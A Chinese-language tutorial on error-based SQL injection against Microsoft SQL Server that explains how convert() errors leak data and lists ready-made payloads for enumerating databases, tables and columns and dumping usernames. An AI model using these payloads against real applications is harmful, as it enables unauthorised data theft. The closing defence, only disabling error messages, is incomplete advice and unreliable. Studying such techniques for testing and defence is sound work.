SQL Server 报错注入(一)
一、原理介绍
报错注入,顾名思义首先这里是有报错信息才可以,其次我们需要人为的制造一些错误,比如使用convert()函数进行类型转换时,如果类型转换失败就会报错,然后这里把我们要执行的SQL语句与convert()函数组合起来,例如convert(int,@@version),在报错信息中就有我们需要的信息。
二、函数介绍
convert()函数介绍:
定义: convert() 函数是把日期转换为新数据类型的通用函数。
用法: convert(int,db_name()),含义是将第二个参数的值转换成第一个参数的int类型。利用MSSQL在转换类型的时候就出错,来爆数据库信息。
quotename()函数介绍:
定义: quotename() 函数默认在要处理的参数左右加上两个中括号,起到分隔符的作用,避免出现sql关键字异常。
用法: quotename(name),给查询出的多个表名、列名加入中括号,或者其他符号为分隔符,进行分割,可使SQL注入结果更清晰。
for xml path(’’)语句介绍:
定义: 提供查询返回的结果为xml格式,此时返回的相当于一个字符串。
用法: 将查询到的数据,通过xml进行显示,path指定xml元素结点(行节点),该语句可以将查询到的所有数据通过XML进行显示。
stuff()函数介绍:
定义: stuff()函数将表中列的内容横向输出。
用法: stuff(param1, startIndex, length, param2),将param1中自startIndex(SQL中都是从1开始,而非0)起,删除length个字符,然后用param2替换删掉的字符。
三、常用数据表介绍
在master数据库中包含了很多系统表,其中sys.databases这张表中储存了SQLServer中所有的数据库的库名;sys.objects表中储存了SQLServer中所有的数据库的表名;sys.columns表中储存了SQLServer中所有的数据表的列名。
四、注入方式
1.爆数据库
id=1' and 1=convert(int,(select db_name(0)))--+
id=1' and 1=convert(int,(select db_name(1)))--+ //查询第二个数据库,以此类推
将所有的数据库连接起来进行显示。
id=1' and 1=convert(int,stuff((select quotename(name) from sys.databases for xml path('')),1,0,''))--+
2.爆数据表
id=1' and 1=convert(int,(select top 1 name from test.sys.objects where type='U'))--+
id=1' and 1=convert(int,stuff((select quotename(name) from test.sys.objects where type='U' for xml path('')),1,0,''))--+
将所有表连接起来进行显示。
3.爆字段(此处方法同上)
id=1' and 1=convert(int,(select top 1 name from test.sys.columns where object_id=object_id('users')))--+
id=1' and 1=convert(int,stuff((select quotename(name) from test.sys.columns where object_id=object_id('users') for xml path('')),1,0,''))--+
4.爆数据
id=1' and 1=convert(int,(select top 1 username from users))--+
id=1' and 1=convert(int,stuff((select quotename(username) from users for xml path('')),1,0,''))--+
五、防御方式
关闭错误提示即可